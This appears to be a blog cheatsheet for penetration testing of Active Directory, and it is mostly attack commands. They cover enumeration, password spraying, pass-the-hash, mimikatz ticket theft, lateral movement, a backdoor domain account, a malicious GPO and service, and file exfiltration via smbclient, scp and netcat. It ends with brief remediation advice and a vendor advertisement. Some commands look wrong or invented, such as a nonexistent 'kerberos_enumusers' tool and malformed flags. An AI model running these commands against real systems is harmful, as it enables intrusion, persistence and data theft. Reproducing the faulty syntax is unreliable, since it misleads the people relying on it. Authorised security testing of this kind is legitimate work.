Active Directory (AD) is a vital component of many organizations’ IT infrastructures, managing user accounts, authentication, and access control. It’s crucial to regularly test its security through penetration testing to identify vulnerabilities and protect your network. This cheatsheet covers essential techniques and tools for effective Active Directory penetration testing, including command examples for various tools.
Information Gathering and Reconnaissance
Enumerate Active Directory Infrastructure
DNS Zone Transfers:
dig axfr @ns.example.com example.com
nslookup -type=AXFR example.com ns.example.com
LDAP Queries:
ldapsearch -x -LLL -H ldap://dc.example.com -D "CN=Administrator,CN=Users,DC=example,DC=com" -w "Password" -b "DC=example,DC=com"
SMB Shares Enumeration:
smbclient -L \\\\target-ip\\ -U user
nmap --script=smb-enum-shares -p445 target-ip
Kerberos Enumeration:
kerberos_enumusers -d EXAMPLE.COM -u 'Administrator' -p 'password'
GetUserSPNs.py -request -dc-ip target-ip -domain EXAMPLE.COM -u 'Administrator' -p 'password'
Identify Vulnerable Services and Misconfigurations
Insecure LDAP Bindings:
tcpdump -i eth0 -vvv -s 0 -l -n port 389
wireshark -k -i eth0 -f "port 389"
Password Policies:
ldapsearch -x -LLL -H ldap://dc.example.com -D "CN=Administrator,CN=Users,DC=example,DC=com" -w "Password" -b "CN=Default Domain Policy,CN=System,DC=example,DC=com"
Get-ADDefaultDomainPasswordPolicy
Unconstrained Delegation:
Get-DomainUser -Properties UserAccountControl -Filter {TrustedForDelegation -eq 'True'}
ldapsearch -x -LLL -H ldap://dc.example.com -D "CN=Administrator,CN=Users,DC=example,DC=com" -w "Password" -b "DC=example,DC=com" "msDS-AllowedToDelegateTo=*"
Exploitation
Exploit Active Directory Vulnerabilities
Password Attacks:
crackmapexec smb target-ip -u user -p password
hydra -L users.txt -P passwords.txt smb://target-ip
pth-winexe -U user%hash //target-ip cmd
Kerberos Attacks:
mimikatz "privilege::debug" "sekurlsa::tickets /export" exit
kekeo tgt::ask /user:Administrator /domain:example.com /rc4:hash
Lateral Movement:
psexec.py user:password@target-ip cmd
wmiexec.py user:password@target-ip
Enter-PSSession -ComputerName target-ip -Credential (Get-Credential)
Privilege Escalation:
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
powershell -exec bypass -Command "Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All"
SharpHound.exe --CollectionMethod All -d example.com -u Administrator -p password
Post-Exploitation
Maintain Access and Exfiltrate Data
Persistence:
- Create a backdoor user account:
net user backdoor-user backdoor-password /add /domain
- Modify Group Policy Objects (GPO):
New-GPO -Name "Malicious GPO" | New-GPLink -Target "OU=Workstations,DC=example,DC=com"
- Deploy a malicious service executable:
sc.exe \\\\target-ip create MaliciousService binPath= "C:\\Windows\\malicious.exe" start= auto
Data Exfiltration:
smbclient \\\\target-ip\\share -U user%password -c 'get sensitive-data.txt'
scp user@target-ip:/path/to/sensitive-data.txt ./
nc -w 3 target-ip 1234 < sensitive-data.txt
Reporting and Remediation
Communicate Findings and Strengthen Active Directory Security
- Reporting: Clearly document vulnerabilities, risks, and remediation recommendations for clients.
- Remediation: Implement suggested security measures, such as multi-factor authentication, strong password policies, and least-privilege access controls to strengthen Active Directory security.
By following this Active Directory penetration testing cheatsheet, security professionals can identify vulnerabilities in their AD infrastructure and take proactive steps to safeguard their network. Regular penetration testing and security assessments are crucial to maintaining a secure IT environment.
If you are a company that requires an internal network penetration test consider Aardwolf Security for your next provider, they utilise senior CREST accredited network penetration testers and have excellent TrustPilot reviews.
1 comment
I AM INTERESTED
Comments are closed.